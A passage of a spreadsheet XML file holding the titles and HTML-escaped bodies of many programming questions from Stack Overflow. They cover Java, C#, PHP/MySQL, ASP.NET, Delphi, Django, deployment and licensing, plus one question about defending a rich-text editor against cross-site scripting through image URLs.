    <t xml:space="preserve">&lt;p&gt;There are certain common components that are used across projects:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;User Authentication and Authorization&lt;/li&gt;
&lt;li&gt;Exception Handling&lt;/li&gt;
&lt;li&gt;Logging&lt;/li&gt;
&lt;li&gt;E-mail&lt;/li&gt;
&lt;li&gt;DataBase Access&lt;/li&gt;
&lt;li&gt;Caching etc&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Is there a consistent design pattern that can be used for each of these common modules? By the way, the framework can vary like JAAS/JNDI for User Authentication and Authorization, log4j/java logging for logging, JavaMail for E-mai, JDBC/Hibernate for DataBase access.  &lt;/p&gt;
&lt;p&gt;For example there is DAO for database access. Is there any good design pattern that can be used for User Authentication and Authorization no matter what framework is used(JAAS/JNDI/SSO)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visio &amp; UML - Showing pointers in attributes and return values</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the requirement of generating UML Diagrams for one of my C++ assignments. I'm using Visio 2007 and I'm having trouble representing C++ pointers. I've found a way to add a suffix to Datatypes however it's rather time consuming to do this for every pointer used or returned in my program. &lt;/p&gt;
&lt;p&gt;Basically I'm trying to get &lt;code&gt;-object1 : Object* = NULL&lt;/code&gt; and &lt;code&gt;+Object() : Object*&lt;/code&gt; without digging into the properties and adding &lt;code&gt;*&lt;/code&gt; to the suffix field every time. &lt;/p&gt;
&lt;p&gt;I'm pretty much stuck with Microsoft software for making diagrams and coding so please don't suggest I use different software. However, if Visual Studio 2003 supports making UML Diagrams in a less painful way than Visio, I wouldn't object to using Visual Studio but please tell me where that option is.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem with updating a MySQL field with PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a query:&lt;/p&gt;
&lt;p&gt;UPDATE choices SET votes = votes + 1 WHERE choice_id = '$user_choice'&lt;/p&gt;
&lt;p&gt;But when I execute it in my script, the votes field is updated twice, so the votes will go from 4 to 6 instead to 5. It doesn't seem that it is getting called twice because I echo out stuff to test this and only get one echo. Is there a way to have it so PHP will only execute this query once per page "refresh"?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;: Thanks for the responses, I'm using regular MySQL, no MySQLi or PDO. Another thing I found is that when doing the query, it works when you start out with 0 and update to 1, but then after that it goes 3, 5, 7, ...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Way to Replace a Visual Component in Delphi</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a Delphi Form, I would like to replace one visual component with another. Example: I want to replace a Panel component with an ElPanel from a 3rd party package. &lt;/p&gt;
&lt;p&gt;I would like all identical properties and events of the first component to be transferred to the new one, and all the components that belong to the first component (e.g. Toolbars, memos,status bars, etc.) to end up placed on the new component exactly where they were on the first one.&lt;/p&gt;
&lt;p&gt;Is there a best/easiest way to do this other than adding the new component to the form and meticulously transferring every property, event and component to it one-by-one?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I calculate the elapsed time of an event in java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's a simple/easy way to access the system clock using Java, so that I can calculate the elapsed time of an event?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to change the name of an iOS app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I began an iPhone project the other day with a silly development code name, and now I want to change the name of the project since it's nearly finished. &lt;/p&gt;
&lt;p&gt;But I'm not sure how to do this with Xcode, trying the obvious of changing the application's name in the info.plist file, causes the signing process to go wrong (I think...) and my app won't launch giving me a Launcher error.&lt;/p&gt;
&lt;p&gt;I guess I could make a new project and copy paste everything over, but it seems so primitive that I'm hoping for a more civilized solution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I call a DLL from a scripting language?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a third-party product, a terminal emulator, which provides a DLL that can be linked to a C program to basically automate the driving of this product (send keystrokes, detect what's on the screen and so forth).&lt;/p&gt;
&lt;p&gt;I want to drive it from a scripting language (I'm comfortable with Python and slightly less so with Perl) so that we don't have to compile and send out executables to our customers whenever there's a problem found.&lt;/p&gt;
&lt;p&gt;We also want the customers to be able to write their own scripts using ours as baselines and they won't entertain the idea of writing and compiling C code.&lt;/p&gt;
&lt;p&gt;What's a good way of getting Python/Perl to interface to a Windows DLL. My first thought was to write a server program and have a Python script communicate with it via TCP but there's got to be an easier solution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sync Framework Resources</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for resources on Microsoft Sync Framework. Although MSDN and Google Search gave me the brief overview, I want some demos and presentations.&lt;/p&gt;
&lt;p&gt;Also, is Live Mesh based on Sync Framework?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Setting a thread priority in a service has no effect</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there some additional configuration needed before I can set thread priorities in a Windows service? &lt;/p&gt;
&lt;p&gt;In my service, I have a few threads that each call the &lt;code&gt;CreateProcess()&lt;/code&gt; function to launch an external application. I would like to adjust thread (or process) priorities to &lt;code&gt;normal&lt;/code&gt; or &lt;code&gt;lower&lt;/code&gt;, depending on some other factors.&lt;/p&gt;
&lt;p&gt;The problem is that &lt;code&gt;SetThreadPriority()&lt;/code&gt; function fails with an error 6 (invalid handle?). I'm passing in a handle obtained from &lt;code&gt;PROCESS_INFORMATION::hThread&lt;/code&gt; (after calling the &lt;code&gt;CreateProcess()&lt;/code&gt; of course), so I think that the handle &lt;em&gt;should&lt;/em&gt; be valid.&lt;/p&gt;
&lt;p&gt;I've also tried setting the priority on the processes using the &lt;code&gt;SetPriorityClass()&lt;/code&gt; function, which also fails.&lt;/p&gt;
&lt;p&gt;The service is logged on as a local user.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which is the best alternative for Java Serialization?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently working on a project which needs to persist any kind of object (of which implementation we don't have any control) so these objects could be recovered afterwards. &lt;/p&gt;
&lt;p&gt;We can't implement an ORM because we can't restrict the users of our library at development time.&lt;/p&gt;
&lt;p&gt;Our first alternative was to serialize it with the Java default serialization but we had a lot of trouble recovering the objects when the users started to pass different versions of the same object (attributes changed types, names, ...).&lt;/p&gt;
&lt;p&gt;We have tried with the XMLEncoder class (transforms an object into a XML), but we have found that there is a lack of functionality (doesn't support Enums for example). &lt;/p&gt;
&lt;p&gt;Finally, we also tried JAXB but this impose our users to annotate their classes.&lt;/p&gt;
&lt;p&gt;Any good alternative?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Convert html to pdf with linked documents inline</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to convert a bundle of static HTML documents into a single PDF file programmatically on the server side on a Java/J2EE platform using a batch process preferably. The pdf files would be distributed to site users for offline browsing of the web pages. &lt;/p&gt;
&lt;p&gt;The major points of the requirements are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The banner at the top should not be present in the final pdf document.&lt;/li&gt;
&lt;li&gt;The navigation bar on the left should be transformed into pdf bookmarks from html hyperlinks.&lt;/li&gt;
&lt;li&gt;All hyperlinked contents (html/pdf/doc/docx etc.) present in the web pages should be part of the final pdf document with pdf bookmarks.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Is there any standard open source way of doing this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Interesting Master's degree programs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm applying for a masters in fall of next year and was wondering if anyone had suggestions for interesting/challenging master's degrees in CS. I think that even though picking the right university is important, it is even more important to pick a master's degree where you'll find talented/creative people to interact and learn from.&lt;/p&gt;
&lt;p&gt;background: never taken AI, discrete math, compilers, operating systems, data structures, cryptography or anything involving c/c++ courses&lt;/p&gt;
&lt;p&gt;looking for: hci research &amp;amp; applications, the future of mobile tech &amp;amp; social interaction, something tangible and not abstract, somewhere where I can take a minor in music/art/design&lt;/p&gt;
&lt;p&gt;inspiration: randy pausch, johnny lee, blaise aguera, jeff han, 42entertainment, and jonathan harris (ted.com)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Automatically remove Subversion unversioned files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anybody know a way to recursively remove all files in a working copy that are not under version control? (I need this to get more reliable results in my automatic build VMware.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Very odd bug when using a System.Timers.Timer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For some odd reason the Elapsed event is firing twice, where it should definitely be firing once.
And immediately after, the timer ceases to work...
The code structure is somewhat like this:
A certain object is defined to fire a certain event when a value it contains, which is constantly updated in 500-1500ms intervals, increases in over X sum compared to the previous value.&lt;/p&gt;
&lt;p&gt;For example, if I define my X as 2, and the values I'm receiving are 1,2,1,2,3,4,8 for example, the event will fire when 8 is entered.
The event handler for that event starts the aforementioned timer, which runs for Y time before it elapses and fires the problematic event.
If the value returns to normal before the timer elapses, the timer is reset.&lt;/p&gt;
&lt;p&gt;So, the overall result should be an application that measures a certain dynamic value, and monitors it for large X size exceptions that occur for over Y seconds time.&lt;/p&gt;
&lt;p&gt;The overall result in code looks something like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;vMonitor.Range=X;
vMonitor.Over+= new EventHandler(StartTimer);
vMonitor.Normal+= new EventHandler(StopTimer);
vTimer.Elapsed+= new EventHandler(RaiseAlert);
source.BeginUpdate(vMonitor.Value);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The actual problem is that the RaiseAlert is fired twice upon the timers elapsing, and then its as if the Timer stops working completely, not firing at all anymore.
I think its worth mentioning that the full application contains a lot of thread activity, with atleast 2 threads running at a time, updating the vMonitor values.&lt;/p&gt;
&lt;p&gt;Any Thoughts?&lt;/p&gt;
&lt;h3&gt;Update:&lt;/h3&gt;
&lt;p&gt;About the thread matter, its fairly complex to explain the exact structure, but I can say that the vMonitor object is contained in another object, that contains the updating value, which is constantly changed by the various threads, in a monitored manner, of course. Whenever the parent object's value is updated, its compared to vMonitor, and the proper event is fired. The value in vMonitor is subsequently replaced by the parent objects value.&lt;/p&gt;
&lt;p&gt;EDIT: I've just verified it again, the vTimer.Elapsed delegate holds only one, correct, event handler.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I compare two ms-access files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to compare two ms-access .mdb files to check that the data they contain is same in both.&lt;/p&gt;
&lt;p&gt;How can I do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When should I use primitives instead of wrapping objects?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Actually &lt;a href="http://stackoverflow.com/questions/564/what-is-the-difference-between-an-int-and-an-integer-in-javac"&gt;here&lt;/a&gt; is a similar topic with little practical value.
As far as I understand, primitives perform better and should be used everywhere except for the cases where Object-related features (e.g. &lt;code&gt;null&lt;/code&gt; check) are needed. Right?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What tools to use for developing flash/flex based touch screen user interface for embedded system</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are looking at developing a device with a touch screen and an embedded PC like computer for the user interface.&lt;/p&gt;
&lt;p&gt;What are the benefits and disadvantages of using flash/flex for this user interface development?&lt;/p&gt;
&lt;p&gt;One of our goals is to seperate the design (= look and feel) and the functionality of the application to ease the development.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL CE 3.5 deployment problem, concerning interop between C# and C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a situation where a C# application is working with SQL CE 3.5 . To allow for a legacy program to use some of its features we have produced a C++ dll which uses interop to extract the info that it needs from the C# program. For this to work, the C#-program needs to access the database. Its not a very complex scenario.&lt;/p&gt;
&lt;p&gt;When trying to deploy with a private install some problems occur though.
&lt;strong&gt;There is no problem with the C# program, it can access the database and work with it without any problems.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;But when trying to access functions in the C#-program through the C++ interop which forces the C#-program to access the database, we get a crash with the exception saying that "...the Provider: System.Data.SqlServerCe.3.5 is not installed".&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This is obviously because we cannot add a App.config file to the executing program.&lt;/p&gt;
&lt;p&gt;How can we get around this? Is there another way to fix this? Any other forms of SQL CE 3.5 install methods are out of the question. So we must get this to work.&lt;/p&gt;
&lt;p&gt;Regards,&lt;/p&gt;
&lt;p&gt;P&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I'm not working against SQL CE directly, but through Linq2SQL. I have tried to add config files to all my dll's, it does not help. It seems to only matter if the executable file have got a app.config.&lt;/p&gt;
&lt;p&gt;The exception thrown says - The provider System.Data.SqlServerCe.3.5 is not installed.&lt;/p&gt;
&lt;p&gt;And the latest function to be called according to the stack trace is
System.Data.Linq.SqlClient.SqlProvider.System.Data.Linq.Provider.IProvider.Initialize(...).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit 2&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I have added all the files necessery for the deployment to work. As I wrote above, it works if I use the program dll (which uses Linq 2 Sql) through a .net executable with a app.config file that specifies where to look for the SQL CE 3.5 dll. Deployment will &lt;em&gt;not&lt;/em&gt; work with only the files, an app.config file is necessary.&lt;/p&gt;
&lt;p&gt;The problem is that we have to use the dll file through a C++ executable which have no means of telling .net where to look for the Sql Ce 3.5 dll.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Question about MSDN and commercial use</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I work for a small digital marketing company as a programmer, and we are not a Microsoft partner or any sort (Gold/Silver/Bronze). However, we use .NET.&lt;/p&gt;
&lt;p&gt;What I am confused about is that the developer before me has left, and he gets subscription DVDs of latest Microsoft tools, delivered to the company (Sql Server etc).&lt;/p&gt;
&lt;p&gt;I am assumign this is not a personal subscription, because if it was he'd have changed addresses.&lt;/p&gt;
&lt;p&gt;Anyway, the subscription is Professional and we use the tools for commercial purposes. Is this allowed? Also, am I allowed to use the tools that we get, at home? I want to use Windows Server at home for dev purposes (learning it for my exams).&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Thanks for the advice guys.&lt;/p&gt;
&lt;p&gt;The license is registered in my boss name but I think a networking guy has added himself as an additional user.&lt;/p&gt;
&lt;p&gt;MSDN FAQ says I can have up to 10 instances of the tools installed. I was thinking if I use a product key off MSDN, then that key is forever in use and no additional licenses can be installed.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Securing .NET application with keys</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am at the point where I need to add keys to my app. What are some of the possible solutions you guys used? I've looked at an earlier &lt;a href="http://stackoverflow.com/questions/118031/best-activation-key-software-for-net-application"&gt;post&lt;/a&gt; so far, anything else before I decide. My 2 influential factors are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Price&lt;/li&gt;
&lt;li&gt;Ease of use&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Web Application Time Zone Issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a ASP.Net 2.0 web application up and running with the server in the Midwest (Eastern Standard Time). At this moment all of our customers are in the same time zone as the server. We are bringing another server online in Arizona (Mountain Standard Time).&lt;/p&gt;
&lt;p&gt;We are storing all our times in a SQL 2005 database via C# codebehind DateTime.UtcNow.&lt;/p&gt;
&lt;p&gt;During testing we encountered some time zone conversion issues.
Our problem is that in the web browser our times are displaying the Mountain Standard Time instead of the time zone we are testing from which is Eastern Standard Time. &lt;/p&gt;
&lt;p&gt;When we enter new information it gets stored as UTC in the database, but when we go to view that info in the browser it is displaying the Mountain Standard Time.
Below is the code which takes the UTC value from the database and displays it in the browser.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;lblUpdatedDate.Text = Convert.ToDateTime(dr["UpdatedDate"]).ToLocalTime().ToString();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The above code returns Mountain Standard Time where the server is, not Eastern Standard Time where the browser is running from. How do we get the time to display where the user is?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I wrap a method so that I can kill its execution if it exceeds a specified timeout?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a method that I would like to call.  However, I'm looking for a clean, simple way to kill it or force it to return if it is taking too long to execute.&lt;/p&gt;
&lt;p&gt;I'm using Java.&lt;/p&gt;
&lt;p&gt;to illustrate:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;logger.info("sequentially executing all batches...");
for (TestExecutor executor : builder.getExecutors()) {
logger.info("executing batch...");
executor.execute();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I figure the &lt;code&gt;TestExecutor&lt;/code&gt; class should &lt;code&gt;implement Callable&lt;/code&gt; and continue in that direction.&lt;/p&gt;
&lt;p&gt;But all i want to be able to do is stop &lt;code&gt;executor.execute()&lt;/code&gt; if it's taking too long.&lt;/p&gt;
&lt;p&gt;Suggestions...?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Many of the suggestions received assume that the method being executed that takes a long time contains some kind of loop and that a variable could periodically be checked.
However, this is not the case.  So something that won't necessarily be clean and that will just stop the execution whereever it is is acceptable.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MYSQL: Create Table If Not Exists</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I do a &lt;strong&gt;Create Table If Not Exists&lt;/strong&gt;, and a table with the same name exists with fewer rows (or columns), what would happen?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Transfer variables between PHP pages</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to get user input in one page, store that in a php variable and use it in another php page. I have tried using 'sessions' but it doesn't seem to be working. Is there another safe alternative? This information is likely to be usernames and passwords.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Convert a string to GregorianCalendar</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a string from an email header, like &lt;code&gt;Date: Mon, 27 Oct 2008 08:33:29 -0700&lt;/code&gt;. What I need is an instance of GregorianCalendar, that will represent the same moment. As easy as that -- how do I do it?&lt;/p&gt;
&lt;p&gt;And for the fastest ones -- this is &lt;strong&gt;not&lt;/strong&gt; going to work properly:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SimpleDateFormat format = ... // whatever you want
Date date = format.parse(myString)
GregorianCalendar calendar = new GregorianCalendar();
calendar.setTime(date)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;because it will normalize the timezone to UTC (or your local machine time, depending on Java version). What I need is calendar.getTimeZone().getRawOffset() to return &lt;code&gt;-7 * milisInAnHour&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In PHP, how do you change the key of an array element?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an associative array in the form &lt;code&gt;key =&amp;gt; value&lt;/code&gt; where key is a numerical value, however it is not a sequential numerical value. The key is actually an ID number and the value is a count. This is fine for most instances, however I want a function that gets the human-readable name of the array and uses that for the key, without changing the value.&lt;/p&gt;
&lt;p&gt;I didn't see a function that does this, but I'm assuming I need to provide the old key and new key (both of which I have) and transform the array. Is there an efficient way of doing this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Programatically read the Documentation section of a WSDL in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i am using a WSDL file to create a the proxy class file, this service has a big Enumeration. the description for each enum value is in documentation section, how can i programatically read that section?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Asp.net Usercontrol LoadControl Issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having an issue when using &lt;code&gt;LoadControl( type, Params )&lt;/code&gt;. Let me explain...&lt;/p&gt;
&lt;p&gt;I have a super simple user control (ascx)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%@ Control Language="C#" AutoEventWireup="True" Inherits="ErrorDisplay" Codebehind="ErrorDisplay.ascx.cs" EnableViewState="false" %&amp;gt;
&amp;lt;asp:Label runat="server" ID="lblTitle" /&amp;gt;
&amp;lt;asp:Label runat="server" ID="lblDescription" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;with code ( c# ) behind of:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public partial class ErrorDisplay : System.Web.UI.UserControl
{
    private Message _ErrorMessage;    
    public ErrorDisplay()
    {
    }
    public ErrorDisplay(Message ErrorMessage)
    {
        _ErrorMessage = ErrorMessage;
    }    
    protected override void OnPreRender(EventArgs e)
    {
        base.OnPreRender(e);
        if (_ErrorMessage != null)
        {
            lblTitle.Text = _ErrorMessage.Message;
            lblDescription.Text = _ErrorMessage.Description;
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Elsewhere in my web application I am adding an instance of the usercontrol to the page using the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;divValidationIssues.Controls.Add(LoadControl(typeof(ErrorDisplay), new object[] { MessageDetails }));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am using the overloaded version of LoadControl because I want to pass the Message parameter to the constructor. All this &lt;em&gt;appears&lt;/em&gt; to work ok.&lt;/p&gt;
&lt;p&gt;However, when the &lt;code&gt;OnPreRender()&lt;/code&gt; is fired on the ErrorDisplay usercontrol the lblTitle and lblDescription variables are both &lt;code&gt;null&lt;/code&gt;, despite them having a markup equivalent. The message variable has been correctly populated.&lt;/p&gt;
&lt;p&gt;Can anyone shed any light on why this may be happening?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Just for clarity I'll also add that the code which is programatically adding the usercontrol to the page is running in response to a button press, so the 'hosting page' has progressed through Init, Page_Load and is now processing the event handlers.&lt;/p&gt;
&lt;p&gt;I cannot add the usercontrols at an earlier asp lifecycle stage as they are being created in response to a button click event.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cross-site scripting from an Image</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a rich-text editor on my site that I'm trying to protect against XSS attacks. I think I have pretty much everything handled, but I'm still unsure about what to do with images. Right now I'm using the following regex to validate image URLs, which I'm assuming will block inline javascript XSS attacks:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"https?://[-A-Za-z0-9+&amp;amp;@#/%?=~_|!:,.;]+"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I'm not sure of is how open this leaves me to XSS attacks from the remote image. Is linking to an external image a serious security threat?&lt;/p&gt;
&lt;p&gt;The only thing I can think of is that the URL entered references a resource that returns "&lt;code&gt;text/javascript&lt;/code&gt;" as its MIME type instead of some sort of image, and that javascript is then executed.&lt;/p&gt;
&lt;p&gt;Is that possible? Is there any other security threat I should consider?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How Important is a Team Having Shared Vision?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Just watching &lt;a href="http://www.infoq.com/interviews/11-Commitments-Jim-McCarthy" rel="nofollow"&gt;Jim McCarthy's talk&lt;/a&gt; about 11 commitments for shared vision over at InfoQ and it got me thinking.&lt;/p&gt;
&lt;p&gt;Specifically, how important is having a shared vision to a team?&lt;/p&gt;
&lt;p&gt;Looking back over my, wow-is-it-that-long, many years in this game I see that the best teams that I've worked on have had a shared vision and shared commitment to the vision.&lt;/p&gt;
&lt;p&gt;Has anyone been involved in a team, for a reasonably sized project, that was successful where they &lt;strong&gt;didn't&lt;/strong&gt; have a shared vision?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to use SQL_ASCII encoding in a rails application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to connect to a legacy postgre database wich has &lt;strong&gt;ENCODING = 'SQL_ASCII';&lt;/strong&gt;. How do I set this encoding in my rails app?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to manually drop down a DataGridViewComboBoxColumn?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a DataGridView with one DataGridViewComboBoxColumn in my WinForms application. I need to drop down (open) this DataGridViewComboBoxColumn manually, let's say after a button is clicked.&lt;/p&gt;
&lt;p&gt;The reason I need this is I have set SelectionMode to FullRowSelect and I need to click 2-3 times to open the combo box. I want to click on the combobox cell and it should drop down immediately. I want to do this with CellClick event, or is there any other way?&lt;/p&gt;
&lt;p&gt;I am searching in Google and VS help, but I haven't found any information yet.&lt;/p&gt;
&lt;p&gt;Can anybody help please?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery UI: Filter selectable dates on datepicker</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to filter the selectable dates on a datepicker. I basically need to filter by work days - i.e. make holidays and weekends not selectable.&lt;/p&gt;
&lt;p&gt;I know you can specify dates using a function in the beforeShowDate: and you can also use $.datepicker.noWeekends.&lt;/p&gt;
&lt;p&gt;Question is: can you do both?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Vista, Office Interop not working</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know how to get the MS Office 2007 .NET C# Interop libraries to work with Vista?  &lt;/p&gt;
&lt;p&gt;I have a  .NET C# application that I have setup to run as a Windows service.  This program will open up a Word or Excel template depending on the situation and modify its contents and then save the document back out.  All of this worked great when I was doing it on a Windows Server 2003 or XP machine using Office 2007.  When I moved everything to a Server 2008 box, everything quit working.  In Excel for example, I get a COM exception telling me that the Excel file cannot be opened when the file is clearly there and I can open it just fine when doing it manually.  The windows service is running under the same user account that I log into the machine with and that account is an Administrator.  &lt;/p&gt;
&lt;p&gt;Does anyone have any idea what to do?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Setting up a backup DB server in ASP.NET web.config file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I currently have an asp.net website hosted on two web servers that sit behind a Cisco load balancer.  The two web servers reference a single MSSQL database server.&lt;/p&gt;
&lt;p&gt;Since this database server is a single point of failure, I'm adding an additional MSSQL server for backup.  I would like to setup my web.config files to write everything to both MSSQL servers, but only read from the "primary" database server unless it is unreachable for some reason, at which point the backup MSSQL server would be used.&lt;/p&gt;
&lt;p&gt;Is this possible via a web.config file setting, or must this be done in code?  Thanks in advance for any help.&lt;/p&gt;
&lt;p&gt;New Information:
I just wanted to add further information on this topic after researching it for the past several days - Microsoft TechNet has a good article title "Implementing Application Failover with Database Mirroring" (&lt;a href="http://www.microsoft.com/technet/prodtechnol/sql/bestpractice/implappfailover.mspx#EMD" rel="nofollow"&gt;http://www.microsoft.com/technet/prodtechnol/sql/bestpractice/implappfailover.mspx#EMD&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;This specifically covers the database mirroring feature in Microsoft SQL Server 2005 and the new new "Failover Partner" connection string keyword that allows you to specify two server/db instances in a single connection string.&lt;/p&gt;
&lt;p&gt;The article is well worth a read if your interested in implementing this type of feature.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Single Table Inheritance in Django</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there explicit support for Single Table Inheritance in Django? Last I heard, the feature was still under development and debate. &lt;/p&gt;
&lt;p&gt;Are there libraries/hacks I can use in the meantime to capture the basic behavior? I have a hierarchy that mixes different objects. The canonical example of a corporation structure with an Employee class, subclasses for types of employees, and a manager_id (parent_id) would be a good approximation of the problem I am solving. &lt;/p&gt;
&lt;p&gt;In my case, I would like to represent the idea that an employee can manage other employees while being managed by a different employee. There are not separate classes for Manager and Worker, which makes this hard to spread across tables. Sub-classes would represent types of employees-programmers, accountants, sales, etc and would be independent of who supervises who (OK, I guess it's no longer a typical corporation in some respect). &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the meaning of CHECKDB=FALSE in MSI?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When running an MSI through the command line what does passing the arguement "CHECKDB=FALSE" really do?&lt;/p&gt;
&lt;p&gt;The MSI of course can be anything from Microsoft, to Compuware DevPartner, to a programmer compiled MSI from .NET.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>"Join" of time series</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am designing a simple internal framework for handling time series data.
Given that LINQ is my current toy hammer, I want to hit everything with it.&lt;/p&gt;
&lt;p&gt;I want to implement methods in class TimeSeries (Select(), Where() and so on) so that I can use LINQ syntax to handle time series data&lt;/p&gt;
&lt;p&gt;Some things are straight forward, e.g. (from x in A select x+10), giving a new time series.&lt;/p&gt;
&lt;p&gt;What is the best syntax design for combining two or more time series?
(from a in A from b in B select a+b) is not great, since it expresses a nested loop.
Maybe some join? This should correspond to join on the implicit time variable.
(What I have in mind corresponds to the lisp 'zip' function)&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; &lt;em&gt;Some clarification is necessary.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;A time series is a kind of function depending on time, e.g. stock quotes.
A combination of time series could be the difference between two stock prices, as a function of time.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Stock1.MyJoin(Stock2, (a,b)=&amp;gt;a-b)
&lt;/code&gt;&lt;/pre&gt;
